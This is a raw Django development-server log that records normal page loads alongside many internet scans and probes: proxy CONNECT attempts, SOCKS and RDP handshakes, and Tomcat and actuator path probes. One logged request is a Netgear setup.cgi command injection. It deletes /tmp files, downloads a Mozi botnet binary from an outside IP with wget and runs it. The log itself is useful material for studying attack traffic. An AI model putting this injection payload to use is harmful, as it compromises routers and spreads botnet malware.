  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Bad Request: /www.shadowserver.org:443
[14/Apr/2023 07:48:31] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 62653
[14/Apr/2023 08:10:07] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 08:10:13] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 08:12:40] code 400, message Bad request version ('À\x13À')
[14/Apr/2023 08:12:40] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 08:56:38] code 400, message Bad HTTP/0.9 request type ('Z¥\x01')
[14/Apr/2023 08:56:38] "Z¥     " 400 -
[14/Apr/2023 09:00:31] code 400, message Bad request version ('À(À$À\x14À')
[14/Apr/2023 09:00:31] You're accessing the development server over HTTPS, but it only supports HTTP.
[14/Apr/2023 09:31:05] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[14/Apr/2023 09:31:05] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 09:58:07] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 7651
Not Found: /actuator/health
[14/Apr/2023 10:10:04] "GET /actuator/health HTTP/1.1" 404 2476
[14/Apr/2023 10:11:50] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 10:11:50] "GET /static/css/custom.css HTTP/1.1" 200 726
[14/Apr/2023 10:11:50] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[14/Apr/2023 10:11:50] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[14/Apr/2023 10:11:50] "GET /favicon.ico HTTP/1.1" 404 2467
Not Found: /actuator/gateway/routes
[14/Apr/2023 10:25:29] "GET /actuator/gateway/routes HTTP/1.1" 404 2500
[14/Apr/2023 10:32:37] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[14/Apr/2023 10:32:37] "  /*à     Cookie: mstshash=Administr" 400 -
[14/Apr/2023 11:52:47] code 400, message Bad request version ('À\x14À')
[14/Apr/2023 11:52:47] You're accessing the development server over HTTPS, but it only supports HTTP.
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 11:58:36] "GET / HTTP/1.0" 400 62668
[14/Apr/2023 12:24:53,054] - Broken pipe from ('162.142.125.216', 35488)
[14/Apr/2023 12:24:54] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 12:24:54,236] - Broken pipe from ('162.142.125.216', 59562)
[14/Apr/2023 12:24:54] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 12:24:54] code 505, message Invalid HTTP version (2.0)
[14/Apr/2023 12:24:54] "PRI * HTTP/2.0" 505 -
Not Found: /favicon.ico
[14/Apr/2023 12:24:54] "GET /favicon.ico HTTP/1.1" 404 2464
[14/Apr/2023 12:26:54] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 12:48:34] "GET / HTTP/1.0" 400 62304
[14/Apr/2023 12:59:50] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 13:03:44] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[14/Apr/2023 13:03:45] "GET /static/admin/css/base.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/css/dark_mode.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/css/nav_sidebar.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/css/changelists.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/css/responsive.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[14/Apr/2023 13:03:45] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/css/fonts.css HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/jquery.init.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/core.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/actions.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/urlify.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/prepopulate.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/nav_sidebar.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/js/filters.js HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/img/tooltag-add.svg HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 304 0
[14/Apr/2023 13:03:45] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 304 0
[14/Apr/2023 13:56:36] code 400, message Bad HTTP/0.9 request type ('\x04\x01\x00\x19Wøa')
[14/Apr/2023 13:56:36] " Wøa " 400 -
[14/Apr/2023 13:56:36,420] - Broken pipe from ('89.248.165.52', 56574)
[14/Apr/2023 13:57:36] code 400, message Bad request syntax ('\x05\x01\x00')
[14/Apr/2023 13:57:36] " " 400 -
[14/Apr/2023 13:57:36,462] - Broken pipe from ('89.248.165.52', 58238)
Invalid HTTP_HOST header: 'smtp.aol.com:25'. You may need to add 'smtp.aol.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'smtp.aol.com:25'. You may need to add 'smtp.aol.com' to ALLOWED_HOSTS.
Bad Request: /smtp.aol.com:25
[14/Apr/2023 13:57:36] "CONNECT smtp.aol.com:25 HTTP/1.1" 400 61725
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[14/Apr/2023 14:35:37] "CONNECT google.com:443 HTTP/1.1" 400 61861
[14/Apr/2023 14:47:23] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 15:01:11] code 400, message Bad HTTP/0.9 request type ('\x04\x01\x00PUÎ')
[14/Apr/2023 15:01:11] " PUÎ s " 400 -
[14/Apr/2023 15:02:11] code 400, message Bad request syntax ('\x05\x01\x00')
[14/Apr/2023 15:02:11] " " 400 -
Invalid HTTP_HOST header: '85.206.160.115:80'. You may need to add '85.206.160.115' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: '85.206.160.115:80'. You may need to add '85.206.160.115' to ALLOWED_HOSTS.
Bad Request: /85.206.160.115:80
[14/Apr/2023 15:02:11] "CONNECT 85.206.160.115:80 HTTP/1.1" 400 61777
[14/Apr/2023 15:38:01] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 15:38:02] "GET /static/css/custom.css HTTP/1.1" 200 726
[14/Apr/2023 15:38:02] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[14/Apr/2023 15:38:02] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[14/Apr/2023 16:44:52] code 400, message Bad request version ('À\x14À')
[14/Apr/2023 16:44:52] You're accessing the development server over HTTPS, but it only supports HTTP.
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[14/Apr/2023 18:59:27] "GET / HTTP/1.1" 200 7651
Not Found: /manager/html
[14/Apr/2023 19:53:12] "GET /manager/html HTTP/1.1" 404 2467
[14/Apr/2023 19:53:12,919] - Broken pipe from ('46.3.113.238', 49878)
[14/Apr/2023 21:09:01] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[14/Apr/2023 22:54:40] "GET / HTTP/1.1" 200 7651
[14/Apr/2023 23:44:44] code 400, message Bad request version ('À(À$À\x14À')
[14/Apr/2023 23:44:44] You're accessing the development server over HTTPS, but it only supports HTTP.
[15/Apr/2023 00:21:32] code 400, message Bad request version ('À\x14À')
[15/Apr/2023 00:21:32] You're accessing the development server over HTTPS, but it only supports HTTP.
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 01:02:30] "GET / HTTP/1.0" 400 61778
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 01:02:30] "OPTIONS / HTTP/1.0" 400 61806
[15/Apr/2023 01:02:30] code 400, message Bad request version ('RTSP/1.0')
[15/Apr/2023 01:02:30] "OPTIONS / RTSP/1.0" 400 -
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /nice ports,/Trinity.txt.bak
[15/Apr/2023 01:02:31] "GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0" 400 61997
[15/Apr/2023 01:02:31] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
[15/Apr/2023 01:02:31] "  " 400 -
[15/Apr/2023 01:02:32] code 400, message Bad request syntax ('\x04\x01\x00\x16\x7f\x00\x00\x01root\x00')
[15/Apr/2023 01:02:32] "   root " 400 -
[15/Apr/2023 01:02:33] code 400, message Bad request version ('\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
[15/Apr/2023 01:02:33] "  (rþ          |                    " 400 -
[15/Apr/2023 01:02:34] code 400, message Bad HTTP/0.9 request type ('\x00')
[15/Apr/2023 01:02:34] "          versionbind   " 400 -
[15/Apr/2023 01:02:34] code 400, message Bad request syntax ('HELP')
[15/Apr/2023 01:02:34] "HELP" 400 -
[15/Apr/2023 01:02:34] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
[15/Apr/2023 01:02:34] You're accessing the development server over HTTPS, but it only supports HTTP.
[15/Apr/2023 01:02:35] code 400, message Bad request version ('\x00/\x00')
[15/Apr/2023 01:02:35] You're accessing the development server over HTTPS, but it only supports HTTP.
[15/Apr/2023 01:02:36] code 400, message Bad request version ('0.12\x00')
[15/Apr/2023 01:02:36] "   ¤ÿSMBr    @              @     PC NETWORK PROGRAM 1.0 MICROSOFT NETWORKS 1.03 MICROSOFT NETWORKS 3.0 LANMAN1.0 LM1.2X002 Samba NT LANMAN 1.0 NT LM 0.12 " 400 -
[15/Apr/2023 01:54:35] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 02:17:02] "GET / HTTP/1.0" 400 62188
[15/Apr/2023 02:56:27] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 03:01:44] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 03:37:33] code 400, message Bad HTTP/0.9 request type ('Z¥\x01')
[15/Apr/2023 03:37:33] "Z¥     " 400 -
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 03:46:31] "GET / HTTP/1.0" 400 62669
[15/Apr/2023 04:41:54,580] - Broken pipe from ('167.94.138.33', 33492)
[15/Apr/2023 04:41:55] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 04:41:55,810] - Broken pipe from ('167.94.138.33', 42392)
[15/Apr/2023 04:41:55] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 04:41:56] code 505, message Invalid HTTP version (2.0)
[15/Apr/2023 04:41:56] "PRI * HTTP/2.0" 505 -
Not Found: /favicon.ico
[15/Apr/2023 04:41:56] "GET /favicon.ico HTTP/1.1" 404 2464
Invalid HTTP_HOST header: 'azenv.net'. You may need to add 'azenv.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'azenv.net'. You may need to add 'azenv.net' to ALLOWED_HOSTS.
Bad Request: /http:/azenv.net/
[15/Apr/2023 05:02:47] "GET http://azenv.net/ HTTP/1.1" 400 62071
[15/Apr/2023 05:26:39] code 400, message Bad request version (';CÕË\x00v')
[15/Apr/2023 05:26:39] You're accessing the development server over HTTPS, but it only supports HTTP.
Not Found: /manager/html
[15/Apr/2023 05:53:08] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 05:53:08,837] - Broken pipe from ('46.3.113.238', 59807)
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /setup.cgi
[15/Apr/2023 06:02:02] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.14.123.172:46176/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 400 63865
[15/Apr/2023 06:04:05] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 07:02:17] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 7651
[15/Apr/2023 07:08:00] code 400, message Bad request version ('À\x14À')
[15/Apr/2023 07:08:00] You're accessing the development server over HTTPS, but it only supports HTTP.
Not Found: /manager/html
[15/Apr/2023 07:29:01] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 07:29:02,162] - Broken pipe from ('46.3.113.238', 49315)
Invalid HTTP_HOST header: 'eth0.me:443'. You may need to add 'eth0.me' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'eth0.me:443'. You may need to add 'eth0.me' to ALLOWED_HOSTS.
Invalid HTTP_HOST header: 'eth0.me'. You may need to add 'eth0.me' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'eth0.me'. You may need to add 'eth0.me' to ALLOWED_HOSTS.
Bad Request: /eth0.me:443
[15/Apr/2023 07:39:20] "CONNECT eth0.me:443 HTTP/1.1" 400 62127
Bad Request: /http:/eth0.me
[15/Apr/2023 07:39:20] "GET http://eth0.me?Z76386225511Q1 HTTP/1.1" 400 63067
[15/Apr/2023 07:39:24] code 400, message Bad request syntax ('\x04\x01\x00P\x05\x84¢\x1b0\x00')
[15/Apr/2023 07:39:24] " P¢0 " 400 -
[15/Apr/2023 07:39:24] code 400, message Bad request syntax ('\x05\x01\x00')
[15/Apr/2023 07:39:24] " " 400 -
Not Found: /actuator/gateway/routes
[15/Apr/2023 07:40:59] "GET /actuator/gateway/routes HTTP/1.1" 404 2500
[15/Apr/2023 08:00:16] "GET / HTTP/1.1" 200 7651
Not Found: /favicon.ico
[15/Apr/2023 08:00:35] "GET /favicon.ico HTTP/1.1" 404 2464
Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Bad Request: /http:/api.ipify.org/
[15/Apr/2023 08:00:49] "GET http://api.ipify.org/?format=json HTTP/1.1" 400 62515
Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Bad Request: /www.shadowserver.org:443
[15/Apr/2023 08:01:01] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 62718
[15/Apr/2023 08:10:12] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 08:10:13] "GET / HTTP/1.1" 200 7651
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[15/Apr/2023 08:21:32] "CONNECT google.com:443 HTTP/1.1" 400 61863
[15/Apr/2023 08:38:18] "GET / HTTP/1.1" 200 7651
Not Found: /aaa9
[15/Apr/2023 09:43:54] "GET /aaa9 HTTP/1.1" 404 2443
Not Found: /aab8
[15/Apr/2023 09:44:07] "GET /aab8 HTTP/1.1" 404 2443
[15/Apr/2023 09:44:21] "GET / HTTP/1.1" 200 7651
Not Found: /manager/html
[15/Apr/2023 10:21:10] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 10:21:10,614] - Broken pipe from ('46.3.113.238', 56802)
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
Not Found: /doc/xml/version.xml
[15/Apr/2023 10:37:38] "GET /doc/xml/version.xml HTTP/1.1" 404 2488
[15/Apr/2023 11:49:46] code 400, message Bad request syntax ('MGLNDD_68.219.92.212_8080')
[15/Apr/2023 11:49:46] "MGLNDD_68.219.92.212_8080" 400 -
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
